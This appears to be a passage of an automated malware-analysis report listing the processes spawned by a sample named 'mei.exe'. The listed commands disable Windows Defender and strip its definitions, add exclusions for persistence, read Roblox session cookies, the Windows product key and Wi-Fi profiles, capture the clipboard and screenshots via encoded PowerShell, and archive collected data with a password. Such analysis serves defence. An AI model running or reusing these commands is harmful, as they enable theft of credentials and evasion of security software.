              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe a -r -hp"netomahserkral" "C:\Users\user\AppData\Local\Temp\XiW2X.zip" *"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe a -r -hp"netomahserkral" "C:\Users\user\AppData\Local\Temp\XiW2X.zip" *
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Users\user\Desktop\mei.exe C:\Users\user\Desktop\mei.exeJump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mei.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mei.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wgovk1sp\wgovk1sp.cmdline
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6964.tmp" "c:\Users\user\AppData\Local\Temp\wgovk1sp\CSC886C9BC3BEB4426790141765FCC41D4.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe a -r -hp"netomahserkral" "C:\Users\user\AppData\Local\Temp\XiW2X.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: mei.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: mei.exeStatic file information: File size 8593769 > 1048576
              Source: mei.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: mei.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: mei.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: mei.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: mei.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: mei.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: mei.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: mei.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653504776.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: mei.exe, 00000000.00000003.1649574507.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
